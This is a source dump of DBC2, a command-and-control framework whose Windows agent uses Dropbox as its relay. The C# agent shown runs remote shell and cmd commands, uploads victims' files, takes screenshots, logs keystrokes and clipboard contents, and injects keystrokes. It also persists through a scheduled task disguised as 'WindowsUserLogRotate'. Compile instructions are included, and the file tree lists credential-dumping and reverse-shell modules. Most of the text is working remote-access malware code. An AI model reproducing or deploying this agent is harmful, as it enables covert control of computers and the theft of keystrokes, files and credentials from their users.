Repository: Arno0x/DBC2 Branch: master Commit: 953a402500dd Files: 46 Total size: 3.2 MB Directory structure: gitextract_hzmncq31/ ├── .gitignore ├── agent/ │ └── source/ │ ├── crypto.cs │ ├── dbc2_agent.cs │ ├── dropboxHandler.cs │ └── misc.cs ├── dbc2Loader/ │ ├── dbc2Loader.cs │ ├── nativeWrapper/ │ │ ├── ConvertTo-Shellcode.ps1 │ │ ├── dbc2LoaderWrapperCLR.cpp │ │ ├── dbc2LoaderWrapperCLR.h │ │ └── readme.md │ └── readme.md ├── dropboxC2.py ├── lib/ │ ├── __init__.py │ ├── agentHandler.py │ ├── console.py │ ├── crypto.py │ ├── dropboxHandler.py │ ├── helpers.py │ ├── mainHandler.py │ ├── pollingThread.py │ ├── stagers.py │ └── statusHandler.py ├── modules/ │ ├── Fun.ps1 │ ├── Invoke-Mimikatz.ps1 │ ├── Invoke-NTLMAuth.ps1 │ ├── Invoke-PowerDump.ps1 │ ├── Invoke-ReflectivePEInjection.ps1 │ ├── Invoke-SendReverseShell.ps1 │ ├── MailRaider.ps1 │ ├── PowerView.ps1 │ ├── Powercat.ps1 │ └── dnscat2.ps1 ├── readme.md ├── requirements.txt └── templates/ ├── batch.tpl ├── dbc2Loader.tpl ├── ducky.tpl ├── javascript.tpl ├── msbuild.tpl ├── oneliner.tpl ├── oneliner2.tpl ├── persist.tpl ├── posh.tpl ├── posh.tpl.old ├── runPSModule.tpl └── sct.tpl ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ /temp /incoming *.pyc myconfig.py config.py ================================================ FILE: agent/source/crypto.cs ================================================ /* Author: Arno0x0x, Twitter: @Arno0x0x */ using System; using System.IO; using System.Security.Cryptography; namespace dropboxc2 { //**************************************************************************************** // Class handling AES-128 CBC with PCKS7 padding cryptographic operations //**************************************************************************************** static class Crypto { public static T[] SubArray(this T[] data, int index, int length) { T[] result = new T[length]; Array.Copy(data, index, result, 0, length); return result; } public static byte[] GetMD5Hash(byte[] source) { return new MD5CryptoServiceProvider().ComputeHash(source); } //-------------------------------------------------------------------------------------------------- // Encrypts the given plaintext message byte array with a given 128 bits key // Returns the encrypted message as follow: // :==============:==================================================: // : IV(16bytes) : Encrypted(data + PKCS7 padding information) : // :==============:==================================================: //-------------------------------------------------------------------------------------------------- static public byte[] EncryptData(byte[] plainMessage, byte[] key) { #if (DEBUG) Console.WriteLine("\t\t[Crypto.EncryptData] Encrypting data..."); #endif // Generate a random IV of 16 bytes RNGCryptoServiceProvider rngCsp = new RNGCryptoServiceProvider(); byte[] IV = new byte[16]; rngCsp.GetBytes(IV); //byte[] cipher = null; // Create an AesManaged object with the specified key and IV. using (AesManaged aes = new AesManaged()) { aes.Padding = PaddingMode.PKCS7; aes.KeySize = 128; aes.Key = key; aes.IV = IV; using (MemoryStream ms = new MemoryStream()) { using (CryptoStream cs = new CryptoStream(ms, aes.CreateEncryptor(), CryptoStreamMode.Write)) { cs.Write(IV, 0, 16); cs.Write(plainMessage, 0, plainMessage.Length); } #if (DEBUG) Console.WriteLine("\t\t[Crypto.EncryptData] Data encrypted"); #endif return ms.ToArray(); } } } //-------------------------------------------------------------------------------------------------- // Decrypts the given a plaintext message byte array with a given 128 bits key // Returns the unencrypted message //-------------------------------------------------------------------------------------------------- static public byte[] DecryptData(byte[] cipher, byte[] key) { #if (DEBUG) Console.WriteLine("\t\t[Crypto.DecryptData] Decrypting data..."); #endif var IV = cipher.SubArray(0, 16); var encryptedMessage = cipher.SubArray(16, cipher.Length - 16); // Create an AesManaged object with the specified key and IV. using (AesManaged aes = new AesManaged()) { aes.Padding = PaddingMode.PKCS7; aes.KeySize = 128; aes.Key = key; aes.IV = IV; using (MemoryStream ms = new MemoryStream()) { using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(), CryptoStreamMode.Write)) { cs.Write(encryptedMessage, 0, encryptedMessage.Length); } #if (DEBUG) Console.WriteLine("\t\t[Crypto.DecryptData] Data decrypted"); #endif return ms.ToArray(); } } } } } ================================================ FILE: agent/source/dbc2_agent.cs ================================================ /* Author: Arno0x0x, Twitter: @Arno0x0x ================================ Compile as an EXE for x64 platform ============================== C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:dbc2_agent.exe *.cs Or, with debug information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /define:DEBUG /out:dbc2_agent_debug.exe *.cs ================================ Compile as an EXE for x86 platform ============================== C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:dbc2_agent.exe *.cs Or, with debug information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /define:DEBUG /out:dbc2_agent_debug.exe *.cs ================================ Compile as a .Net DLL for x86 platform ============================== Can be used with DotNetToJScript: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:dbc2_agent.dll *.cs Then: DotNetToJScript.exe --ver=auto -l JScript -c dropboxc2.C2_Agent dbc2_agent.dll > dbc2.js ===================== Compile as a DLL with exported function for unmanaged code ================= This requires the use of the RGiesecke.DllExport nugget package. Code must be compiled from VisualStudio with the DLLEXPORT defined flag */ using System; using System.Threading; using System.IO; using System.Text; using System.Management; using System.Net.NetworkInformation; using System.Diagnostics; using System.Runtime.InteropServices; #if (DLLEXPORT) using RGiesecke.DllExport; #endif namespace dropboxc2 { //**************************************************************************************** // Main class //**************************************************************************************** [ComVisible(true)] public class C2_Agent { //-------------------------------------------------------------------------------------------------- // Class global variables string accessToken = String.Empty; byte[] cryptoKey; Mutex mutex = null; // Mutex used to ensure there's only one agent running at a time int pollingPeriod = 8000; // Nominal polling period in milliseconds int deviation = 20; // Deviation is a percentage of variation around the polling period int sleepTime = 0; // Actual sleeping period: a random result based on the pollingPeriod and the deviation string agentID = String.Empty; string c2StatusFile = String.Empty; // The status file that will be used to notify about the agent status string c2StatusFileLastRevNumber = String.Empty; // The last revision number for the status file string c2CmdFile = String.Empty; // The Command file that will be used to receive commands string c2CmdFileLastRevNumber = String.Empty; // The last revision number for the command file StringBuilder keylogged; // All data logged by the keylogger thread StringBuilder clipboardLogged; // All data logged by the clipboard logger thread //-------------------------------------------------------------------------------------------------- // Shell mode variables bool shellMode = false; Process shellProcess = null; // The child process used for a more interactive shell private static StringBuilder shellOutput = new StringBuilder(); int savedPollingPeriod = 0; int savedDeviation = 0; //================================================================================================== // Constructors of the DBC2 agent //================================================================================================== public C2_Agent(string[] args) { //--------------------------------------------------------------------- // Check arguments have been passed if (args.Length == 2) { // Retrieve AccessToken and CryptoKey from passed arguments accessToken = args[0]; cryptoKey = Convert.FromBase64String(args[1]); Run(); } else { // If missing arguments, we should return.... return; } } //================================================================================================== // Static entry point for the program as an executable, also exported for use as a DLL //================================================================================================== #if (DLLEXPORT) [DllExport("dbc2", CallingConvention = CallingConvention.Cdecl)] #endif public static void Main(string[] args) { C2_Agent c2_agent = new C2_Agent(args); } //================================================================================================== // Main function //================================================================================================== private void Run() { // Get a unique ID for the machine this agent is running on agentID = createAgentID(); mutex = new Mutex(false, @"Global\" + agentID); // Check if another instance of an agent is already running if(!mutex.WaitOne(0, false)) { #if (DEBUG) Console.WriteLine("[ERROR] Another instance of the agent is already running"); #endif return; } //--------------------------------------------------------------------- #if (DEBUG) Console.WriteLine("------------ AGENT STARTING ------------"); #endif // Break flag used to exit the agent bool breakFlag = false; c2StatusFile = "/" + agentID + ".status"; c2CmdFile = "/" + agentID + ".cmd"; // Initializing a DropboxHandler object to handle all communications with the Dropbox C2 server DropboxHandler dropboxHandler = new DropboxHandler(accessToken); #if (DEBUG) Console.WriteLine("[Main] Uploading status and command file to the C2 server"); #endif // Create the c2StatusFile and c2CmdFile on the Dropbox server. These files act as an unique identifier for this agent // as well as a receiver for commands from the server c2CmdFileLastRevNumber = dropboxHandler.putFile(c2CmdFile, Encoding.ASCII.GetBytes("")); c2StatusFileLastRevNumber = dropboxHandler.putFile(c2StatusFile, Encoding.ASCII.GetBytes("")); if (c2StatusFileLastRevNumber == String.Empty || c2CmdFileLastRevNumber == String.Empty) { #if (DEBUG) Console.WriteLine("[Main][ERROR] Cannot create files on the C2 server"); #endif breakFlag = true; } else { #if (DEBUG) Console.WriteLine("[Main] C2 Files created - Agent ready"); #endif } // Set initial sleep time to the nominal polling period with a deviation sleepTime = getRandomPeriod(); //--------------------------------------------------------------------------------- // Main loop //--------------------------------------------------------------------------------- while (!breakFlag) { #if (DEBUG) Console.WriteLine("[Main loop] Going to sleep for " + sleepTime / 1000 + " seconds"); #endif // Wait for the polling period to time out Thread.Sleep(sleepTime); #if (DEBUG) Console.WriteLine("[Main loop] Waking up"); #endif // Calculate next sleep time sleepTime = getRandomPeriod(); //---------------------------------------------------------------------------- // Check if we're in shellMode if (shellMode) { // So we're in shell mode, is there some shell output to push to the C2 ? int currentLength = shellOutput.Length; if (currentLength > 0) { string output = shellOutput.ToString(0, currentLength); shellOutput.Remove(0, currentLength); dropboxHandler.putFile("/" + agentID + ".dd", Crypto.EncryptData(Encoding.UTF8.GetBytes(output), cryptoKey)); } } //---------------------------------------------------------------------------- // At each cycle, 'touch' the status file to show the agent is alive = beaconing c2StatusFileLastRevNumber = dropboxHandler.putFile(c2StatusFile, Encoding.ASCII.GetBytes("READY - " + DateTime.Now.ToString())); // Check the c2 command File revision number string revNumber = dropboxHandler.getRevNumber(c2CmdFile); if (revNumber == String.Empty) { #if (DEBUG) Console.WriteLine("[Main loop][ERROR] Unable to get the revision number for the command file"); #endif // There was an error retrieving the last revision number, skip this turn continue; } //---------------------------------------------------------------------------- // If the revision number is different, that means there's a new command to be treated if (revNumber != c2CmdFileLastRevNumber) { #if (DEBUG) Console.WriteLine("[Main loop] Command file has a new revision number: [" + revNumber + "]"); #endif c2CmdFileLastRevNumber = revNumber; // Read the content of the C2 file string content = Encoding.UTF8.GetString(Crypto.DecryptData(dropboxHandler.readFile(c2CmdFile), cryptoKey)); if (content == String.Empty) { #if (DEBUG) Console.WriteLine("[Main loop][ERROR] C2 command file on the server seems empty..."); #endif continue; } //--------------------------------------------------------------------------------------------------- // Parse the received command to extract all required fields StringReader strReader = new StringReader(content); string result = String.Empty; string command = strReader.ReadLine(); string taskID = strReader.ReadLine(); string taskResultFile = "/" + agentID + "." + taskID; #if (DEBUG) Console.WriteLine("[Main loop] Command to execute: [" + command + "]"); #endif //--------------------------------------------------------------------------------------------------- // Command routing //--------------------------------------------------------------------------------------------------- switch (command) { case "shell": string shellCommand = strReader.ReadLine(); shellMode = true; #if (DEBUG) Console.WriteLine("\t[shell] Executing: [" + shellCommand + "]"); #endif // Send the command to the child process runShell(shellCommand); break; case "runCLI": string commandLine = strReader.ReadLine(); #if (DEBUG) Console.WriteLine("\t[runCLI] Executing: [" + commandLine + "]"); #endif // Execute the command result = runCMD(commandLine); if (result == null) { result = "ERROR - COULD NOT EXECUTE COMMAND:" + commandLine; #if (DEBUG) Console.WriteLine("\t[runCLI][ERROR] External command did not executed properly"); #endif } // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.UTF8.GetBytes(result), cryptoKey)); break; case "launchProcess": string exeName = strReader.ReadLine(); string arguments = strReader.ReadLine(); #if (DEBUG) Console.WriteLine("\t[launchProcess] Executing: [" + exeName + " " + arguments + "]"); #endif // Execute the command if (launchProcess(exeName, arguments)) { result = "OK - PROCESS STARTED: " + exeName + arguments; } else { result = "ERROR - COULD NOT EXECUTE: " + exeName + " " + arguments; #if (DEBUG) Console.WriteLine("\t[launchProcess][ERROR] External command did not executed properly"); #endif } // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); break; case "sendFile": string localFile = strReader.ReadLine(); string remoteFile = taskResultFile + ".rsc"; #if (DEBUG) Console.WriteLine("\t[sendFile] Uploading file [" + localFile + "] to [" + remoteFile + "]"); #endif if (File.Exists(localFile)) { // First push the wanted local file to the C2 server dropboxHandler.putFile(remoteFile, Crypto.EncryptData(File.ReadAllBytes(localFile), cryptoKey)); #if (DEBUG) Console.WriteLine("\t[sendFile] File uploaded"); #endif // The task result is the path to the uploaded resource file result = remoteFile; } else { // Push the command result to the C2 server result = "ERROR - FILE NOT FOUND: " + localFile; #if (DEBUG) Console.WriteLine("\t[sendFile][ERROR] Command did not executed properly. Localfile not found : [" + localFile + "]"); #endif } // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); break; case "downloadFile": remoteFile = strReader.ReadLine(); string localPath = strReader.ReadLine(); string fileName = strReader.ReadLine(); if (localPath == "temp") { localPath = Path.GetTempPath(); } #if (DEBUG) Console.WriteLine("\t[downloadFile] Downloading file from [" + remoteFile + "] to [" + localPath + fileName + "]"); #endif if (dropboxHandler.downloadFile(remoteFile, localPath + fileName)) { #if (DEBUG) Console.WriteLine("\t[downloadFile] File downloaded"); #endif result = "OK - FILE DOWNLOADED AT: " + localPath + fileName; } else { #if (DEBUG) Console.WriteLine("\t[downloadFile][ERROR] Could not download file"); #endif result = "ERROR - COULD NOT WRITE FILE AT LOCATION: " + localPath + fileName; } // remote file must be deleted dropboxHandler.deleteFile(remoteFile); // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); break; case "sleep": int requestedSleepTime; string value = strReader.ReadLine(); if (Int32.TryParse(value, out requestedSleepTime)) { sleepTime = requestedSleepTime * 60 * 1000; #if (DEBUG) Console.WriteLine("\t[sleep] Next sleep is: " + sleepTime + " minute(s)"); #endif // Compute wake up time DateTime wakeUpTime = DateTime.Now.AddMinutes(sleepTime); result = "SLEEPING" + "," + wakeUpTime.ToUniversalTime().ToString("yyyy-MM-ddTHH:mm:ssZ"); c2StatusFileLastRevNumber = dropboxHandler.putFile(c2StatusFile, Encoding.ASCII.GetBytes(result)); } else { #if (DEBUG) Console.WriteLine("\t[sleep][ERROR] Invalid amount of time specified [" + value + "]"); #endif result = "ERROR - INVALID AMOUNT OF TIME FOR SLEEP: " + value; } // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); break; case "polling": int requestedPeriod, requestDeviation; string value1 = strReader.ReadLine(); string value2 = strReader.ReadLine(); if (Int32.TryParse(value1, out requestedPeriod) && Int32.TryParse(value2, out requestDeviation)) { pollingPeriod = requestedPeriod * 1000; deviation = requestDeviation; #if (DEBUG) Console.WriteLine("\t[polling] Polling period changed to {0}s with a deviation of {1}% ", pollingPeriod, deviation); #endif result = "OK - PERIOD AND DEVIATION CHANGED"; } else { #if (DEBUG) Console.WriteLine("\t[polling][ERROR] Invalid value for period or deviation [{0}] / [{1}] of {1}% ", value1, value2); #endif result = "ERROR - INVALID INTEGER VALUE FOR PERIOD AND/OR DEVIATION: " + value1 + value2; } // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); break; case "screenshot": // Set the screenshot file name on the C2 server remoteFile = taskResultFile + ".rsc"; #if (DEBUG) Console.WriteLine("\t[screenshot] Taking screenshot and converting it to a JPG image"); #endif // Push the image to the C2 server dropboxHandler.putFile(remoteFile, Crypto.EncryptData(Screenshot.takeScreenShot(), cryptoKey)); // The task result is the path to the uploaded screenshot file result = remoteFile; #if (DEBUG) Console.WriteLine("\t[screenshot] Uploading JPG screenshot to [" + remoteFile + "]"); #endif // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); break; case "keylogger": string action = strReader.ReadLine(); if (action == "start") { keylogged = new StringBuilder(); // Start the keylogging function KeyLogger.OnKeyDown += key => { keylogged.Append("d[" + key + "]\n"); }; KeyLogger.OnKeyUp += key => { keylogged.Append("u[" + key + "]\n"); }; KeyLogger.Start(); #if (DEBUG) Console.WriteLine("\t[keylogger] KeyLogger started"); #endif result = "OK - KeyLogger started"; } else { KeyLogger.Stop(); result = keylogged.ToString(); keylogged.Clear(); #if (DEBUG) Console.WriteLine("\t[keylogger] KeyLogger stopped"); #endif } // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); break; case "clipboardlogger": action = strReader.ReadLine(); if (action == "start") { clipboardLogged = new StringBuilder(); // Start the keylogging function ClipboardLogger.OnKeyBoardEvent += text => { clipboardLogged.Append(text+"\n");}; ClipboardLogger.Start(); #if (DEBUG) Console.WriteLine("\t[clipboardlogger] Clipboard Logger started"); #endif result = "OK - Clipboard logger started"; } else { ClipboardLogger.Stop(); result = clipboardLogged.ToString(); clipboardLogged.Clear(); #if (DEBUG) Console.WriteLine("\t[clipboardlogger] Clipboard logger stopped"); #endif } // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); break; case "sendkeystrokes": string procName = strReader.ReadLine(); string keys = strReader.ReadLine(); Process[] pList= Process.GetProcessesByName(procName); if( pList.Length > 0) { Process p = pList[0]; #if (DEBUG) Console.WriteLine("\t[sendkeystrokes] Sending key strokes to process " + procName + "\n" + keys); #endif if (KeyStrokes.sendKeyStrokes(p, keys)) { result = "OK - Key strokes sent to process " + procName; } else { result = "ERROR - Could not send key strokes to the process, probably wrong keystrokes sequence"; } } else { #if (DEBUG) Console.WriteLine("\t[sendkeystrokes] Error, could not find process with name " + procName); #endif result = "ERROR - Could not find a process with name " + procName; } // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); break; case "persist": // Get the current command line through which the stage was started, and string oneLiner = Environment.CommandLine; #if (DEBUG) Console.WriteLine("\t[persist] Setting agent persistency through scheduled task"); #endif // Create a fake/misleading batch script in the user's profile string fileDir = Environment.ExpandEnvironmentVariables(@"%USERPROFILE%\AppData\Local\WindowsUserLogRotate"); Directory.CreateDirectory(fileDir); string filePath = fileDir + @"\logrotate.bat"; System.IO.File.WriteAllText(filePath, oneLiner); commandLine = "schtasks /create /TN 'WindowsUserLogRotate' /TR '" + filePath +"' /SC ONIDLE /i 20"; result = runCMD(commandLine); // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.UTF8.GetBytes(result), cryptoKey)); break; case "stop": #if (DEBUG) Console.WriteLine("\t[stop] Stopping agent"); #endif result = "OK - STOPPING"; // Push the command result to the C2 server dropboxHandler.putFile(taskResultFile, Crypto.EncryptData(Encoding.ASCII.GetBytes(result), cryptoKey)); breakFlag = true; break; } } else { #if (DEBUG) Console.WriteLine("[Main loop] revNumber [" + revNumber + "] hasn't changed, nothing to treat"); #endif } } #if (DEBUG) Console.WriteLine("[Main] Exiting... "); #endif } //================================================================================================== // This method returns a random pollingPeriod using an average value and a deviation around that value //================================================================================================== private int getRandomPeriod() { Random random = new Random((int)DateTime.Now.Ticks); return random.Next(pollingPeriod - pollingPeriod * deviation / 100, pollingPeriod + pollingPeriod * deviation / 100); // Current sleep time, if agent is sleeping, this value increases } ///================================================================================================== // This method runs a command in a spawned child process (powershell.exe). The child process is // kept alive until it is explicitely exited. This allows for contextual commands and persistent // environment between commands. //================================================================================================== private void runShell(string command) { try { // Check if we already have a shell child process running // If not, start it and create the output and error data received callback if (shellProcess == null) { // Save the current period and deviation savedPollingPeriod = pollingPeriod; savedDeviation = deviation; // Set a shorter polling perdio for better interaction pollingPeriod = 2000; deviation = 0; #if (DEBUG) Console.WriteLine("\t\t[runShellCmd] Spawning a child process"); #endif ProcessStartInfo procStartInfo = new ProcessStartInfo(); procStartInfo.UseShellExecute = false; procStartInfo.RedirectStandardInput = true; procStartInfo.RedirectStandardOutput = true; procStartInfo.RedirectStandardError = true; procStartInfo.FileName = "powershell.exe"; procStartInfo.Arguments = "\"-\""; procStartInfo.CreateNoWindow = true; procStartInfo.ErrorDialog = false; shellProcess = new Process(); shellProcess.StartInfo = procStartInfo; shellProcess.EnableRaisingEvents = true; shellProcess.OutputDataReceived += (sender, e) => { if (!String.IsNullOrEmpty(e.Data)) { #if (DEBUG) Console.WriteLine(e.Data); #endif shellOutput.Append(e.Data + "\n"); } }; shellProcess.ErrorDataReceived += (sender, e) => { if (!String.IsNullOrEmpty(e.Data)) { #if (DEBUG) Console.WriteLine(e.Data); #endif shellOutput.Append(e.Data + "\n"); } }; shellProcess.Exited += (sender, e) => { shellMode = false; pollingPeriod = savedPollingPeriod; deviation = savedDeviation; shellOutput.Clear(); shellProcess = null; }; shellProcess.Start(); shellProcess.BeginOutputReadLine(); shellProcess.BeginErrorReadLine(); } // Write the command to stdin shellProcess.StandardInput.WriteLine(command); } catch (Exception ex) { // Log the exception #if (DEBUG) while (ex != null) { Console.WriteLine("[ERROR] " + ex.Message); ex = ex.InnerException; } #endif } } //================================================================================================== // This method runs an external command line on the sytem, using the windows interpreter (cmd.exe). // It returns the command result (output or error) //================================================================================================== private string runCMD(string command) { string result = null; try { // create the ProcessStartInfo using "cmd" as the program to be run and "/c " as the parameters. // Incidentally, /c tells cmd that we want it to execute the command that follows and then exit. ProcessStartInfo procStartInfo = new ProcessStartInfo("cmd", "/c " + command); // Redirect both the standard output and the standard error stream // This means that it will be redirected to the Process.StandardOutput StreamReader. procStartInfo.RedirectStandardOutput = true; procStartInfo.RedirectStandardError = true; procStartInfo.UseShellExecute = false; // Run silently, do not create a console window procStartInfo.CreateNoWindow = true; // Create a process, assign its ProcessStartInfo and start it System.Diagnostics.Process proc = new Process(); proc.StartInfo = procStartInfo; proc.Start(); // Get the output into a string result = proc.StandardOutput.ReadToEnd(); proc.WaitForExit(); // If there was an error, read the standard error stream if (proc.ExitCode != 0) result += proc.StandardError.ReadToEnd(); // Return the command output return result; } catch (Exception ex) { // Log the exception #if (DEBUG) while (ex != null) { Console.WriteLine("[ERROR] " + ex.Message); ex = ex.InnerException; } #endif return result; } } //================================================================================================== // This method launches an external executable. // It returns true if the process was launched, false otherwise //================================================================================================== private bool launchProcess(string exeName, string args) { try { ProcessStartInfo procStartInfo = new ProcessStartInfo(exeName, args); procStartInfo.UseShellExecute = false; // Run silently, do not create a console window procStartInfo.CreateNoWindow = true; // Create a process, assign its ProcessStartInfo and start it System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo = procStartInfo; proc.Start(); return true; } catch (Exception ex) { // Log the exception #if (DEBUG) while (ex != null) { Console.WriteLine("[ERROR] " + ex.Message); ex = ex.InnerException; } #endif return false; } } //================================================================================================== // createAgentID method // This method returns a unique ID for the machine it's running on. // Ideally, the ID has to be unique worldwide as multiple agents may run on various machine and refer to the same C2 server //================================================================================================== private string createAgentID() { string uniqueID = string.Empty; //------------------------------------------------------------- // First, get the CPU ID. Only the first CPU ID gets retrieved string cpuID = string.Empty; ManagementClass mc = new ManagementClass("win32_processor"); ManagementObjectCollection moc = mc.GetInstances(); foreach (ManagementObject mo in moc) { if (cpuID == "") { cpuID = mo.Properties["processorID"].Value.ToString(); } } //------------------------------------------------------------- // Second, get the MAC address from the first NIC interface found string sMacAddress = string.Empty; NetworkInterface[] nics = NetworkInterface.GetAllNetworkInterfaces(); foreach (NetworkInterface adapter in nics) { if (sMacAddress == String.Empty)// only return MAC Address from first card { //IPInterfaceProperties properties = adapter.GetIPProperties(); Line is not required sMacAddress = adapter.GetPhysicalAddress().ToString(); } } //------------------------------------------------------------- // Eventually, compute a MD5 hash of both cpuID and sMacAddress byte[] tmpSource, tmpHash; tmpSource = Encoding.Unicode.GetBytes(cpuID + sMacAddress); tmpHash = Crypto.GetMD5Hash(tmpSource); uniqueID = BitConverter.ToString(tmpHash).Replace("-", string.Empty).ToLower(); return uniqueID; } } } ================================================ FILE: agent/source/dropboxHandler.cs ================================================ /* Author: Arno0x0x, Twitter: @Arno0x0x */ using System; using System.Net; using System.Text; using System.Collections; using System.Web.Script.Serialization; namespace dropboxc2 { //**************************************************************************************** // Class handling all communications with the Dropbox server //**************************************************************************************** class DropboxHandler { WebClient webClient; // WebClient object to communicate with the C2 server string accessToken; // Dropbox API access token string authorizationHeader; // List of Dropbox API URL entry points static Hashtable dropboxAPI = new Hashtable() { {"listFolder", "https://api.dropboxapi.com/2/files/list_folder" }, {"move","https://api.dropboxapi.com/2/files/move" }, {"uploadFile", "https://content.dropboxapi.com/2/files/upload" }, {"downloadFile", "https://content.dropboxapi.com/2/files/download" }, {"deleteFile", "https://api.dropboxapi.com/2/files/delete" }, {"getMetaData", "https://api.dropboxapi.com/2/files/get_metadata" } }; //-------------------------------------------------------------------------------------------------- // Constructor method //-------------------------------------------------------------------------------------------------- public DropboxHandler (string token) { accessToken = token; authorizationHeader = "Bearer " + accessToken; // Create a WebClient object to communicate with the C2 server webClient = new WebClient(); //------------------------------------------------------------------ // Check if an HTTP proxy is configured on the system, if so, use it IWebProxy defaultProxy = WebRequest.DefaultWebProxy; if (defaultProxy != null) { defaultProxy.Credentials = CredentialCache.DefaultCredentials; webClient.Proxy = defaultProxy; } // Set the Authorization header used for all API requests webClient.Headers.Add("Authorization", authorizationHeader); // Set the User-Agent header used for all API requests webClient.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0"); } //-------------------------------------------------------------------------------------------------- // Creates a file on the C2 server at the given path, containing the given bytes. // Returns the revision number for the file created. //-------------------------------------------------------------------------------------------------- public string putFile (string path, byte[] data) { #if (DEBUG) Console.WriteLine("\t\t[DropboxHandler.putFile] Uploading file..."); #endif string command = @"{""path"": """ + path + @""",""mode"": ""overwrite"",""autorename"": false,""mute"": true}"; string revNumber = String.Empty; webClient.Headers["Content-Type"] = "application/octet-stream"; webClient.Headers["Dropbox-API-Arg"] = command; try { byte[] responseArray = webClient.UploadData((string)dropboxAPI["uploadFile"], data); JavaScriptSerializer serializer = new JavaScriptSerializer(); dynamic item = serializer.Deserialize(Encoding.ASCII.GetString(responseArray)); revNumber = item["rev"]; } catch (Exception ex) { #if (DEBUG) while (ex != null) { Console.WriteLine("[ERROR] " + ex.Message); ex = ex.InnerException; } #endif return revNumber; } #if (DEBUG) Console.WriteLine("\t\t[DropboxHandler.putFile] File upload DONE"); #endif return revNumber; } //-------------------------------------------------------------------------------------------------- // Returns the revision number of a file given in argument //-------------------------------------------------------------------------------------------------- public string getRevNumber(string path) { string command = @"{""path"": """ + path + @""",""include_media_info"": false,""include_deleted"": false,""include_has_explicit_shared_members"": false}"; string revNumber = String.Empty; webClient.Headers.Remove("Dropbox-API-Arg"); webClient.Headers["Content-Type"] = "application/json"; byte[] data = Encoding.ASCII.GetBytes(command); try { byte[] responseArray = webClient.UploadData((string)dropboxAPI["getMetaData"], data); JavaScriptSerializer serializer = new JavaScriptSerializer(); dynamic item = serializer.Deserialize(Encoding.ASCII.GetString(responseArray)); revNumber = item["rev"]; return revNumber; } catch (Exception ex) { #if (DEBUG) while (ex != null) { Console.WriteLine("[ERROR] " + ex.Message); ex = ex.InnerException; } #endif return revNumber; } } //-------------------------------------------------------------------------------------------------- // Returns true if no error occured, false otherwise //-------------------------------------------------------------------------------------------------- public bool deleteFile(string path) { string command = @"{""path"": """ + path + @"""}"; string revNumber = String.Empty; webClient.Headers.Remove("Dropbox-API-Arg"); webClient.Headers["Content-Type"] = "application/json"; byte[] data = Encoding.ASCII.GetBytes(command); try { webClient.UploadData((string)dropboxAPI["deleteFile"], data); return true; } catch (Exception ex) { #if (DEBUG) while (ex != null) { Console.WriteLine("[ERROR] " + ex.Message); ex = ex.InnerException; } #endif return false; } } //-------------------------------------------------------------------------------------------------- // Reads a remote file and return its content as a byte array //-------------------------------------------------------------------------------------------------- public byte[] readFile(string path) { string command = @"{""path"": """ + path + @"""}"; byte[] response = null; webClient.Headers.Remove("Content-Type"); webClient.Headers["Dropbox-API-Arg"] = command; try { response = webClient.DownloadData((string)dropboxAPI["downloadFile"]); return response; } catch (Exception ex) { #if (DEBUG) while (ex != null) { Console.WriteLine("[ERROR] " + ex.Message); ex = ex.InnerException; } #endif return response; } } //-------------------------------------------------------------------------------------------------- // Downloads a remoteFile to a local one // Returns true if all went OK, false otherwise //-------------------------------------------------------------------------------------------------- public bool downloadFile(string remoteFile, string localFile) { string command = @"{""path"": """ + remoteFile + @"""}"; webClient.Headers.Remove("Content-Type"); webClient.Headers["Dropbox-API-Arg"] = command; #if (DEBUG) Console.WriteLine("\t\t[DropboxHandler.downloadFile] Downloading file..."); #endif try { webClient.DownloadFile((string)dropboxAPI["downloadFile"], localFile); #if (DEBUG) Console.WriteLine("\t\t[DropboxHandler.downloadFile] File downloaded"); #endif return true; } catch (Exception ex) { #if (DEBUG) while (ex != null) { Console.WriteLine("[ERROR] " + ex.Message); ex = ex.InnerException; } #endif return false; } } } } ================================================ FILE: agent/source/misc.cs ================================================ /* Author: Arno0x0x, Twitter: @Arno0x0x */ using System; using System.IO; using System.Diagnostics; using System.Threading; using System.Windows.Forms; using System.Drawing; using System.Collections.Generic; using System.Runtime.InteropServices; namespace dropboxc2 { //**************************************************************************************** // Class holding native Win32 API functions //**************************************************************************************** internal static class NativeFunctions { [DllImport("user32.dll")] internal static extern short GetAsyncKeyState(Keys vKey); [DllImport("user32.dll")] internal static extern int SetForegroundWindow(IntPtr point); [DllImport("user32.dll")] internal static extern int ShowWindow(int hwnd, int nCmdShow); [DllImport("user32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] internal static extern bool AddClipboardFormatListener(IntPtr hwnd); [DllImport("user32.dll", SetLastError = true)] internal static extern IntPtr SetParent(IntPtr hWndChild, IntPtr hWndNewParent); internal const int 